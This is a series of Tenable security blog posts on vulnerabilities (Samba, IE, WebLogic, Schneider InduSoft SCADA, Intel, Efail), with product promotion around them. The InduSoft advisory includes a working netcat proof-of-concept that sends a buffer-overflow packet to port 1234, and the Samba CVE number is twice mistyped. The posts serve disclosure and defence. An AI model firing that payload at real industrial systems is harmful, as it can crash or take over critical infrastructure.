How to audit AWS Three-tier Architecture with Tenable using the CIS benchmark

To get started, log into Tenable.io and create a new Audit Cloud Infrastructure scan. In your scan configuration, select the Compliance tab. Under Amazon AWS, CIS Amazon Web Services Three-tier Web Architecture Benchmarks are now available. Due to AWS flexibility, the audit utilizes variables to ensure the checks are specific to your environment.

Once the configuration is saved, run the scan and review the results. Below is sample output from a scan.

Below is a closer view of one of the results. This page shows:

• Pass/fail status
• Remediation steps, if necessary
• Individual results from the systems scanned
• Reference information to cybersecurity frameworks

Reduce your Cyber Exposure gap

We can help you reduce your organization's Cyber Exposure gap. One way of orchestrating this is by continuously updating our compliance audits and obtaining CIS certifications.

With Tenable.io, you can gain full visibility and maintain compliance across many public cloud infrastructures. In addition to AWS compliance scanning, Tenable offers solutions for Microsoft Azure, Rackspace and OpenStack. Start your free, 60-day Tenable.io trial now.

Every month, we ask our researchers to nominate a vulnerability of the month. Novelty, sophistication or just plain weirdness are some of the potential criteria for selecting a vulnerability of the month. After the nominations are collected, the candidates are shortlisted and voted on by our 70-plus-member research organization, combining the total experience and knowledge of Tenable Research to identify the vulnerability of the month.

Background

In mid-March, Samba released an advisory on two critical vulnerabilities. One of these, CVE-2018-1057, allows unprivileged users to change any user password including privileged service and admin user accounts. Researcher Björn Baumbach from SerNet is credited with discovering this vulnerability.

What makes this the vulnerability of the month?

Samba administrators were likely eager to mitigate this vulnerability in mid-March based on the serious implications of CVE-2081-1057 and the other vulnerability included in the patch release. Samba is free, open-source software for file and print services that helps integrate Linux/Unix servers and desktops into Active Directory environments. These qualities have made Samba very popular with widespread prevalence, meaning any vulnerabilities in Samba have potentially wide-reaching impact. One common application of Samba is to provide file and printer sharing services for Linux-based network attached storage (NAS) and storage area network (SAN) systems. Samba file servers can store diverse data, including sensitive data, personally identifiable information and intellectual property.

CVE-2081-1057, in particular, has both accidental and malicious implications. On the accidental, potentially mischievous side, authenticated users could change their coworkers’ passwords, locking them out as a fun office prank.

More seriously, malicious attackers who have gained any legitimate credentials, for example via social engineering, can change the passwords of admin and domain controller accounts and thereby take control of them, escalating their privileges. Using a simple phishing campaign, coupled with this vulnerability, an attacker could navigate through targeted environments horizontally and vertically throughout the organization with minimal effort.

However, attackers don’t have to rely on social engineering or phishing to leverage this vulnerability. Once a machine has been compromised, it can be leveraged to interact with Samba Active Directory Domain Controller (AD DC) and allow the attacker to access accounts with similar or increased permissions.

Vulnerability details

According to the advisory, in all versions of Samba AD DC from 4.0.0 onward, the Lightweight Directory Access Protocol (LDAP) server incorrectly validates permissions to change passwords. This allows authenticated users to change other users' passwords, including administrative users and DCs.

The advisory specifies that “the LDAP server incorrectly validates certain LDAP password modifications against the ‘Change Password’ privilege, but then performs a password reset operation.”

Samba released a patch for Samba versions 4.7.6, 4.6.14 and 4.5.16 and outlined a few workarounds, including revoking change password rights “for 'the world' from all user objects (including computers) in the directory, leaving only the right to change a user's own password.”

Additional resources

• Threat Post Samba Patches Two Critical Vulnerabilities in Server Software
• Samba CVE-2018-1057 FAQ
• Samba Security Releases
• Learn more about Tenable.io&reg, the first Cyber Exposure platform for holistic management of your modern attack surface
• Get a free, 60-day trial of Tenable.io; Vulnerability Management

Microsoft's legacy browser Internet Explorer (IE) has been used for almost three decades, but not without issues. IE has been so plagued with security problems that Microsoft built a new, more secure browser called Edge. But there are still some issues. Edge’s forward-leaning technology doesn’t support some of IE’s legacy capabilities. For that reason, IE still comes installed on all Windows operating systems. So, once again, IE has been exploited by attackers, as discovered and observed in the wild by the Chinese security firm Qihoo 360. They’re calling this new zero-day vulnerability Double Kill. The firm believes this is an advanced persistent threat (APT) aimed at achieving ongoing access to targeted systems.

Impact assessment

Technical details and a POC have not been released at this time. However, Qihoo 360 has stated that Double Kill involves an IE vulnerability which uses Microsoft Word documents (usually sent as an email attachment) as the attack vector. Qihoo 360 also states that the document contains some unspecified sort of shellcode. Internet Explorer is somehow opened in the background processes, which leads to an executable program being downloaded and executed – without any visible warning to the user. Opening malicious documents with Double Kill allows attackers to control victims’ computers without their knowledge, making ransomware infection, eavesdropping and data leakage convenient and stealthy.

Vulnerability details

These types of attacks typically begin with spear phishing attempts, a type of email-spoofing attack that targets specific organizations or individuals. If successful, an individual may unknowingly activate malware embedded within attached Word documents, believing they are from a trusted source. In many attack scenarios, attackers get in and get out quickly to avoid detection. With an APT, the goal of the attacker is to achieve ongoing access.

Exploitation

The Word document in question doesn't automatically download to the computer, and requires interaction on behalf of the user. Users must be on IE, and they must open the infected file, which would then launch a malicious webpage. The malware then uses a user account control bypass and file steganography, or what is called the embedding of a file, message or image within another file, message or image.

Urgently required actions

Stop using IE. Microsoft has not released a statement or any patches at this time. If, for some reason, you need to continue using IE, follow IT security best practices.

Tenable^® has developed several Nessus^® and NNM plugins for IE, which can help you discover, identify and assess potential vulnerabilities in the legacy browser.

Get more information:

• Qihoo 360 blog post
• Learn more about Tenable.io^®, the first Cyber Exposure platform for holistic management of your modern attack surface
• Get a free 60-day trial of Tenable.io Vulnerability Management

One of the many issues that should have been addressed by Oracle’s Critical Patch Update for April 2018 was a fix for a flaw affecting versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 of the Oracle WebLogic Server (WLS) Java Enterprise Edition (EE) application server. This vulnerability, which has been assigned CVE-2018-2628 (CVSS Base Score: 9.8), is a critical issue that can be exploited by an attacker with network access via the T3 protocol. The T3 protocol is used to transport information between WebLogic servers and other types of Java programs. However, the patch was unsuccessful and this issue can still be exploited.

Impact assessment

With the recent discovery of the Oracle vulnerability, attackers are scanning the internet for Oracle WLS installations on Transmission Control Protocol (TCP) port 7001 to exploit. Once discovered, a remote attacker can target an Oracle WLS system and may execute arbitrary commands.

Vulnerability details

Exploitation

This vulnerability is nothing new. WebLogic has been affected by a number of Java deserialization vulnerabilities since FoxGlove Security published their wonderful article, “What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.” In fact, Tenable® has released five different research advisories regarding deserialization attacks over T3:

1. https://www.tenable.com/security/research/tra-2016-09
2. https://www.tenable.com/security/research/tra-2016-21
3. https://www.tenable.com/security/research/tra-2016-33
4. https://www.tenable.com/security/research/tra-2017-07
5. https://www.tenable.com/security/research/tra-2017-16

WebLogic’s T3 protocol relies on serialized Java objects for communication, making it particularly vulnerable to this bug class. These vulnerabilities arise when a program attempts to use data that was serialized (converted to another format for transportation). When a program deserializes untrusted serialized Java objects, the serialized objects can control code flow and eventually take over execution entirely. Oracle hasn’t done themselves any favors by choosing to “fix” these attacks by creating a list of objects that can’t be deserialized (also known as a blacklist).

Before you panic though, let’s look at what CVE-2018-2628 actually is. This vulnerability is a blacklist bypass. That means an attacker can sidestep the blacklist to deserialize any object on the target classpath. And that’s the catch. Oracle has done a good job of mitigating all the publicly disclosed Java deserialization RCE gadgets. Therefore, even though Oracle has released an ineffective patch for CVE-2018-2628, a patched server may not be vulnerable to a remote code execution (RCE) in all cases.

For example, take a look at the proof of concept on exploit DB. When you run the exploit against 12.2.1.3, you’ll find this output in the WebLogic log:

This log shows that the initial connect back was successfully deserialized. However, because ysoserial (a proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization) is configured to execute CommonsCollections1, the attacker can’t achieve RCE because the object that allowed RCE in the past can no longer be serialized or deserialized.

Oracle removed the vulnerable Apache Commons Collections from the classpath in 2017.

Similarly, there have been tweets about using the ysoserial payload Jdk7u21, which is a deserialization endpoint in the Java runtime environment. However, that was patched in Java 7 in 2013 and in Java 8 in 2014. If you’re running Java versions that old then, yeah, you’ve got problems and this exploit may be an issue.

Prevalence

We haven’t seen reports of servers being attacked using the vulnerabilities identified in CVE-2018-2628 yet. But the attention this vulnerability is getting increases the chances that we’ll see attacks soon. This is an easily exploitable vulnerability that requires no authentication. Successful attacks of this vulnerability can result in takeover of Oracle WLS. Prevalence could be high if running one of the affected versions. It should be noted that Oracle WebLogic servers have been a target in the past. Previously, a vulnerability identified by CVE-2017-10271 was used by threat actors to deliver cryptocurrency miners.

Urgently required actions

Oracle has issued a fix as part of the April 2018 Critical Patch Update that was supposed to address this concern. Unfortunately, it fails to do so. While the patch update misses the mark, organizations should still apply the update, as many other security concerns are addressed.

In the meantime, vulnerable systems should be identified and the risk should be managed according to your organization's security policies. Tenable offers several methods to assist organizations in detecting this vulnerability.

Identifying affected systems

This Nessus^® plugin detects if the version of Oracle WLS installed on the remote host is affected by multiple vulnerabilities:

The following Nessus plugins are for all T3 deserialization attacks:

Tenable.io^® Container Security also detects the issue, and will detect affected version of WebLogic automatically.

Get more information

• Oracle Critical Patch Update Advisory - April 2018
• Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface
• Get a free 60-day trial of Tenable.io Vulnerability Management

Special thanks to Jacob Baines for contributing to this blog post.

Tenable Research recently discovered a new remote code execution vulnerability in Schneider Electric’s InduSoft Web Studio and InTouch Machine Edition. The applications contain an overflow condition that is triggered when input is not properly validated. This allows an attacker to force a stack-based buffer overflow, resulting in denial of service or potentially allowing the execution of arbitrary code.

Background

InduSoft Web Studio is a suite of tools that provides automation building blocks to develop human-machine interfaces (HMIs), Supervisory Control And Data Acquisition (SCADA) systems and embedded instrumentation solutions.

InTouch Machine Edition is an HMI/SCADA software toolset to develop applications to connect automation systems such as Programmable Logic Controllers (PLCs) and to develop interfaces for web browsers, smartphones and tablets.

SCADA systems, comprising industrial-grade hardware and software, are a standard component of Industrial Control Systems (ICSs). They have traditionally been deployed around the world to monitor industrial infrastructure to collect, analyze and control information from sensors. With the growing adoption of distributed and remote monitoring in industrial environments, SCADA and operational technology (OT) are converging to provide true “beyond the perimeter” connectivity.

Diverse industries including agriculture, transportation, energy, nuclear power, manufacturing, entertainment and physical security use SCADA in conjunction with OT. Because of the critical and wide range of applications in modern infrastructure, SCADA systems have become a primary security concern and are increasingly being targeted by threat actors.

Analysis

Tenable Research found a new stack-based buffer overflow in InduSoft Web Studio and InTouch Machine Edition. A threat actor could send a crafted packet to exploit the buffer overflow vulnerability using a tag, alarm, event, read or write action to execute code.

The vulnerability can be remotely exploited without authentication and targets the IWS Runtime Data Server service, by default on TCP port 1234. The software implements a custom protocol that uses various “commands.” This vulnerability is triggered through command 50, and is caused by the incorrect usage of a string conversion function.

The vulnerability, when exploited, could allow an unauthenticated malicious entity to remotely execute code with high privileges.

The following is a proof of concept:

cat <(echo -ne '\x02\x57\x03\x02\x32'`python -c 'print "A"*0x500'`'\x09\x0a\x03') - | nc <target_host> 1234

Business impact

An unauthenticated remote attacker can leverage this attack to execute arbitrary code on vulnerable systems, potentially leading to full compromise of the InduSoft Web Studio or InTouch Machine Edition server machine. A threat actor can use the compromised machine to laterally transfer within the victims network and to execute further attacks. Additionally, connected HMI clients and OT devices can be exposed to attack.

Given the widespread prevalence and market share of the affected software in the OT space, and the fact that it is frequently deployed in sensitive industries, Schneider and Tenable consider this a critical vulnerability requiring urgent attention and response from affected end users.

Vulnerability characterization and CVSSv3 rating

CWE-121: Stack-based Buffer Overflow

InduSoft Web Studio and ITME: 9.8 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Solution

Schneider Electric has released InduSoft Web Studio v8.1 SP1 and InTouch Machine Edition 2017 v8.1 SP1 to address this vulnerability. Update the application by applying the appropriate patches.

• If you’re using InduSoft Web Studio v8.1 or prior versions, you should upgrade and apply InduSoft Web Studio v8.1 SP1 as soon as possible.
• If you’re using InTouch Machine Edition 2017 v8.1 or prior versions, you should upgrade and apply InTouch Machine Edition 2017 v8.1 SP1 as soon as possible.

Identifying affected systems

Tenable released the following plugins to identify affected systems for the Schneider Electric InduSoft Web Studio/InTouch Machine Edition systems:

• 109143 Schneider Electric InTouch Machine Edition RCE (Apr 2018)
• 109144 Schneider Electric InduSoft Web Studio RCE (Apr 2018)
• 109145 Schneider Electric InTouch Machine Edition Detection
• 109146 Schneider Electric InduSoft Web Studio Detection
• 109280 Schneider Electric InduSoft Web Studio / InTouch Machine Edition Opcode 50 mbstowcs() Stack Overflow
• All other Schneider plugins available

Additional information

• Schneider Electric Security Bulletin
• Tenable Research Advisory
• Stack Based Overflow Software Weaknesses
• Learn more about Tenable.io®, the first Cyber Exposure platform for holistic management of your modern attack surface
• Get a free 60-day trial of Tenable.io Vulnerability Management

Special thanks to Steve Tilson, Josef Weiss and Jacob Baines for their contributions to this blog post.

Patch Tuesday was anything but typical in the month of May. On May 8, Microsoft released security patches for a total of 67 vulnerabilities, addressing 21 critical vulnerabilities, 42 important and four low-severity, while Adobe addressed a critical flaw in Adobe Flash Player. This is a big push from Microsoft in securing Windows, coming right after the recent release of Windows 10, version 1803, which added several security improvements, among other feature updates.

However, what makes this update particularly important is that it addresses two zero-day vulnerabilities that are being actively exploited in the wild and a further two for which public exploits have been published.

The first critical vulnerability is the Internet Explorer (IE) Double Kill vulnerability (CVE-2018-8174), which Tenable reported on in April 2018. The second zero-day is CVE-2018-8120, a privilege escalation vulnerability within the Win32k component. Microsoft also patched CVE-2018-8141 (Windows kernel information disclosure vulnerability) and CVE-2018-8170 (Windows image elevation of privilege vulnerability). Technical details, including exploits for both of these CVEs are public, but attackers don't seem to be taking advantage of them at the time of writing this post.

A patch for a critical Adobe Flash Player vulnerability (CVE-2018-4944) was also released as part of Adobe’s Patch Tuesday update.

Impact assessment

For anyone running Windows 10, all but one of the CVEs pose a considerable risk and represent an urgent security concern. These can lead to full system compromise if left unmitigated.

One zero-day, IE Double Kill, affects the current version of IE and other applications that use the browser. The other zero-day is the Win32k privilege escalation vulnerability that impacts Windows 7 and Server 2008 users. Both zero-day vulnerabilities permit privilege escalation and full system compromise if exploited.

Vulnerability details

Microsoft’s May security release includes security updates for the following applications:

• Internet Explorer
• Microsoft Edge
• Microsoft Windows
• Microsoft Office and Microsoft Office Services and Web Apps
• ChakraCore
• Adobe Flash Player
• .NET Framework
• Microsoft Exchange Server
• Windows Host Compute Service Shim

The most critical fixes in this security update are for Internet Explorer and Microsoft Windows. Also contained within the update are several patches for Office, Outlook and SharePoint rated as important. An Exchange update and the .NET Framework also have a couple of patches rated Important.

CVE-2018-8174, aka “IE Double-kill”, is being actively exploited in the wild. Additional details on this vulnerability can be found here. This is an extremely dangerous vulnerability, as it not only targets the browser, but also affects ActiveX controls and embedded scripts in Office documents. Until a patch has been applied, attackers can potentially force Internet Explorer to load, even if IE is not the default browser.

CVE-2018-8120, a privilege escalation vulnerability within the Win32k component, is also being actively exploited in the wild and is rated as “Important.” It only affects Windows 7, Windows Server 2008 and Windows Server 2008 R2.

Urgently required actions

Due to public exploit availability and the active exploitation of these vulnerabilities, we recommend that users urgently install the security updates to protect themselves.

Tenable has the following Nessus plugins for detection of the vulnerabilities for CVE-2018-8174, CVE-2018-8120, CVE-2018-8141 and CVE-2018-8170.

Get more information:

• Microsoft Security TechCenter
• Adobe Security Bulletin
• Learn more about Tenable.io®, the first Cyber Exposure platform for holistic management of your modern attack surface
• Get a free 60-day trial of Tenable.io Vulnerability Management

Since its introduction in 2003, SecurityCenter^® has continually driven innovation in the vulnerability management market, enabling organizations to manage and measure Cyber Exposure across IT assets. With the recent spate of high-profile breaches and threats – Equifax, WannaCry, Petya/NotPetya and others – there’s never been a greater need for effective cyber hygiene. And that starts with vulnerability management.

We’ve been hard at work enhancing SecurityCenter to help you take the next step forward in maturing your security program. Our latest innovations are focused on enterprise manageability, performance and analytical improvements, and technology integrations. We’re excited to take the wraps off some recent feature and integration releases and give you a glimpse into what's coming soon. Let’s take a look!

Enterprise manageability

We’ve enhanced enterprise-level manageability to accommodate localized security policy requirements and enriched asset detection for diverse IT environments, with the following:

• Multi-LDAP support: Many large organizations use more than one LDAP server, which creates challenges for those using LDAP to authorize SecurityCenter users. By adding support for using multiple LDAP servers to authorize SecurityCenter users, we’re helping customers reduce operational overhead and administrative challenges and support compliance with local security policies.
• Expanded asset discovery and fingerprinting for IT environments: We’ve recently enhanced detections for dozens of new asset attributes to increase both the breadth and depth of asset discovery. We added printer detection via TLS/SSL, MAC Address discovery via SNMP and VXLAN, Hostname via DNS and mDNS and many more. Our patented passive network monitoring technology (Nessus^® Network Monitor) sees and identifies devices that would otherwise go undetected by other VM solutions.

Performance and analytical improvements

To help security teams be as effective and efficient as possible, we’re continuing to invest in SecurityCenter in the areas of performance and analytical capabilities, and we’re pleased to announce key enhancements:

• Performance improvements with multi-threading: By updating SecurityCenter to take advantage of multi-threading, we’re delivering performance and speed increases that enable up to a 50-percent reduction in the time required for dynamic asset preparation for larger data sets, increased speed for Recast/Accept and faster searching with plugin text searches and for complex searches on Plugin Output.
• Plugin filtering: This advanced scanning capability gives customers the ability to filter by plugin family type, such as Backdoors or Brute Force Attacks. It helps you save time and increase productivity by providing a comprehensive view of plugins associated with a specific family type.
• CVSSv3 (coming in Q3):To ensure the most accurate vulnerability scores, SecurityCenter will soon pull vulnerability scores from CVSS version 3, the latest version of CVSS. CVSS is the industry-standard vulnerability scoring system and SecurityCenter’s main scoring system for vulnerabilities. CVSS version 3 aims to provide clearer, more consistent and more accurate scores for modern-day vulnerabilities.

Technology integrations

Tenable is integrating SecurityCenter with even more market-leading technology solutions to solve a broad set of customer challenges and automate more processes. From ingesting third-party data to simplifying credential management, SecurityCenter’s integrations make it easier for organizations to manage their vulnerability management program and minimize risk:

• ServiceNow: This new integration allows customers to seamlessly export SecurityCenter vulnerability data into ServiceNow Vulnerability Response, making it easier to gain continuous visibility from vulnerability detection and prioritization through remediation. With this, customers can move beyond manual exporting and importing by automating and speeding the resolution of security issues. With Tenable and ServiceNow, your security team can focus on security, not IT.
• CyberArk: We’ve enhanced the integration between SecurityCenter and CyberArk to simplify the way customers manage access to privileged credentials for vulnerability and compliance scans. Users no longer need to store and manage their credentials within SecurityCenter to perform authenticated scans, easing administration and reducing the complexity of credential management.
• BMC: This new integration allows customers to automatically export Tenable vulnerability and compliance violation findings into the BMC SecOps Response Service to accelerate incident response.
• BeyondTrust (coming in Q3): Tenable will automatically obtain privileged credentials from BeyondTrust PowerBroker to perform authenticated scans.This integration simplifies management of user access and privileges while scanning for vulnerabilities and compliance checks with SecurityCenter. Users get full administrator-level access to the system they’re scanning.
• Lieberman (coming in Q3): This integration gives joint customers the ability to configure SecurityCenter to pull credentials from Lieberman RED for authenticated scanning. Users will be able to more easily run credentialed scans to yield deeper, more accurate scan results to get better visibility into vulnerabilities on their network.
• Expanded SIEM integrations: To ensure customers can seamlessly import vulnerability data into their central correlation platforms, we’re expanding our integrations with SIEM providers. We’ve recently completed integrations with LogRhythm and IBM QRadar. And coming soon, you’ll see support for McAfee ESM (coming in Q3) as well as an updated Splunk application (coming in Q2) that enhances the user experience and ensures easy transfer of data.

We’re excited to share these innovations in SecurityCenter and how we’re continuing to enhance the platform to meet customers’ vulnerability management needs.

To learn more about how organizations are using SecurityCenter to gain better visibility and understanding of their IT environments, check out this great talk by Jered Bare from CARFAX on building custom tools with the SecurityCenter API, given at our recent user conference, Edge 2018.

We continue driving SecurityCenter forward to support demanding enterprise requirements, providing security teams with automated, continuous and accurate visibility into their IT assets.

Want to learn more? Join our customer community or contact us to learn more about SecurityCenter and our recent and upcoming innovations.

Tenable Research has a dedicated team that performs vulnerability research on software and hardware from third-party vendors. The goal is to discover zero-day vulnerabilities and work with vendors to get them addressed before hackers discover and exploit them. This post provides an overview of all the vulnerabilities discovered by Tenable Research in April.

You can access all Tenable Research advisories here.

To close numerous security gaps, Microsoft, Adobe, Apple, Red Hat, Xen, VMware and other vendors have released a number of patches in the first 10 days of May. We discussed some of these in our recent blog post, Microsoft May Madness. However, one issue that stands out because it impacts multiple operating system platforms is the chip giant Intel’s CVE-2018-8897. A problem that’s being framed as a “developers documentation misunderstanding” has turned into a cross-platform patch requirement to secure the kernel. To be clear, the issue doesn’t exist in the chip itself – rather, in the way developers have built their software stacks to interact with the processor.

Modern processors provide a hardware debugging infrastructure that allows system designers and developers to debug their system and monitor events. When such events occur during the course of program execution, a debug exception is raised. Developers at various vendors misunderstood Intel’s documentation about the way processors handle that exception. This has led to a flaw being present on multiple platforms that could allow unauthenticated users to read sensitive data in memory or control low-level operating system functions by gaining elevated privileges. The flaw was reported by researchers Nick Peterson of Everdox Tech and Nemanja Mulasmajic of triplefault.io in their detailed white paper POP SS/MOV SS Vulnerability.

Analysis

The vulnerability itself is not remotely exploitable and an attacker would need to have access to the system. At the time of publication, there’s no indication that attackers have exploited the issue on any operating system. Also, no proof of concept exploit code has been publicly released. However, it should be noted that some researchers have stated that they can exploit Windows systems and should be able to exploit Linux as well. Hence, our recommendation is to mitigate as soon as possible.

Solution

Refer to vendor-specific documentation for patching.

Intel has released the following statement, according to Digitpol: “The security of our customers and partners is important to us. To help ensure clear communication with the developer community, we are updating our Software Developers Manual (SDM) with clarifying language on the secure use of the POP/MOV-SS instructions. We recommend that system software vendors evaluate their software to confirm their products handle the situations in question.”

Tenable has released multiple plugins to help our customers determine their Cyber Exposure gap.

Additional information

• CERT Advisory for CVE-2018-8897
• Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface
• Get a free 60-day trial of Tenable.io Vulnerability Management

Email continues to be one of the most popular ways to communicate in the world today. And given the rapidly evolving threat landscape, email encryption has never been more critical. Pretty Good Privacy (PGP) has long been a trusted platform for encrypted messaging and remains a popular method of sending secure, private email.

On May 14, a research team led by Sebastian Schinzel, researcher and professor of computer security at Münster University of Applied Sciences, disclosed critical vulnerabilities in implementations of several email clients and the OpenPGP and S/MIME standards that could be exploited to disclose sensitive information by exfiltrating plaintext of encrypted messages. It’s also possible that old messages which were previously encrypted could be disclosed.

The research team is using the name Efail to describe these vulnerabilities. They released a technical report with details. Essentially, Efail attacks exploit weaknesses in the various email clients, PGP and S/MIME, by tricking email clients into revealing the plaintext of the encrypted emails to the attacker. In the technical paper, researchers state that for the attack against the email clients that involves direct exfiltration, “EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim's email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.”

The second issue, named the CBC/CFB Gadget attack, abuses vulnerabilities in the specification of OpenPGP and S/MIME, thereby allowing the attacker to exfiltrate the plaintext from encrypted messages.

After reviewing the research, the Electronic Frontier Foundation (EFF) also stated it could “confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.”

There’s an ongoing debate in the cybersecurity community whether these issues are in the specifications or the email clients. Some cybersecurity professionals have expressed concerns that the issue also affects the core protocol of PGP, including file encryption. GNU Privacy Guard tweeted, “They figured out mail clients which don't properly check for decryption errors and also follow links in HTML mails. So the vulnerability is in the mail clients and not in the protocols. In fact OpenPGP is immune if used correctly while S/MIME has no deployed mitigation.”

Due to the risk and severity of the vulnerabilities, it’s likely the affected vendors will release patches to mitigate both these issues before a comprehensive evaluation of the PGP and S/MIME specifications are conducted.

Solution

There are currently no reliable fixes for these issues. There’s a large list of vendors affected (see section titled “Responsible Disclosure”).

Tenable Research is closely following the developing situation for these vulnerabilities:

• CVE-2017-17688: OpenPGP CFB gadget attacks
• CVE-2017-17689: S/MIME CBC gadget attacks

If OpenPGP is patched to detect and discard messages with modified ciphertext, Tenable’s container security would detect outdated versions. Similarly, when mail clients take steps to mitigate these issues, Container Security would detect those outdated versions as well.

We’re monitoring the situation and are actively working on releasing checks and plugins to help our customers determine if they’re vulnerable and assess their Cyber Exposure.

Some interim mitigations

• Don’t decrypt email messages using vulnerable clients. Use a standalone application to decrypt email messages, so that direct exfiltration channels aren’t opened up as a result of these vulnerabilities. This trade-off involves the addition of an extra step when receiving encrypted messages.
• Disable rendering of remote content in messages on email clients. This reduces the attack surface area and raises the bar for exploitation. However, this will also mean that active content in messages cannot be viewed.
• Apply patches from vendors as soon as they are available.

Additional information

• Read the Efail Technical Paper
• Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface
• Get a free 60-day trial of Tenable.io Container Security